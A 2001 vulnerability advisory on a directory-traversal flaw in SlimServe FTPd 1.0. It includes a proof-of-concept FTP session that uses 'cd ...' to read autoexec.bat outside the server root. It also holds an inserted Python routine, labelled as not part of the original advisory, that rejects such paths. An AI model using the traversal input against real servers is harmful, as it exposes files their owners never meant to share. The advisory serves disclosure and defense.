Reported March 1, 2001, by Ken Pfeil.
VERSIONS AFFECTED
- SlimServe FTPd 1.0
DESCRIPTION
A vulnerability exists that lets an attacker break out of FTP root by using relative paths. For example, by connecting to a vulnerable host and issuing the command "cd ..." an attacker can access the root directory where the FTP server is running.
DEMONSTRATION
Joe Testa also provided the following proof-of-concept scenario:
C:\> ftp hostname
Connected to vulnerablehost.somewhere.com.
220-SlimServe FTPd 1.0 :: www.whitsoftdev.com.
220 127.0.0.1 connected to vulnerablehost.somewhere.com.
User (vulnerablehost.somewhere.com:(none)): anonymous
230 User anonymous logged in, proceed.
ftp> cd ...
250 CWD command successful.
ftp> get autoexec.bat
200 PORT command successful.
150 Opening data connection for "/.../autoexec.bat".
250 RETR command successful.
ftp: 383 bytes received in 0.16Seconds 2.39Kbytes/sec.
ftp> bye
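A server-side path check that would refuse the "cd ..." and "/.../autoexec.bat" requests shown above, as an added example in Python (not SlimServe's code and not part of the original advisory). The function names and the policy of rejecting every dot-only component are assumptions made for illustration.

```python
import os

class PathEscape(Exception):
    """Raised when a client-supplied path would leave the FTP root."""

def resolve_virtual(cwd, arg):
    """Resolve a CWD/RETR argument against the session's virtual directory.

    Works purely on strings, so the result never depends on how the host
    OS interprets unusual components. Returns a normalized '/'-rooted path.
    """
    arg = arg.replace("\\", "/")            # treat both separators alike
    if ":" in arg or any(ord(c) < 32 for c in arg):
        raise PathEscape("drive specifier or control character")
    parts = [] if arg.startswith("/") else [p for p in cwd.split("/") if p]
    for comp in arg.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:
                raise PathEscape("'..' above the FTP root")
            parts.pop()
        elif not comp.strip(". "):          # only dots/spaces: "...", "....", ". ."
            raise PathEscape("dot-only component %r" % comp)
        else:
            parts.append(comp)
    return "/" + "/".join(parts)

def to_local(ftp_root, virtual):
    """Map a resolved virtual path to a local path and re-check containment."""
    root = os.path.realpath(ftp_root)
    local = os.path.realpath(os.path.join(root, *virtual.strip("/").split("/")))
    if os.path.commonpath([root, local]) != root:   # catches symlink escapes
        raise PathEscape("resolved path is outside the FTP root")
    return local

def is_rejected(cwd, arg):
    """True when the argument is refused; convenience for logging and tests."""
    try:
        resolve_virtual(cwd, arg)
        return False
    except PathEscape:
        return True
```

The virtual path is resolved before any filesystem call, and the containment check in to_local is a second layer that runs on the fully resolved local path.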
VENDOR RESPONSE
The vendor, WhitSoft Development, has been notified. However, no workaround or fix is currently available.
CREDIT
Discovered by Joe Testa.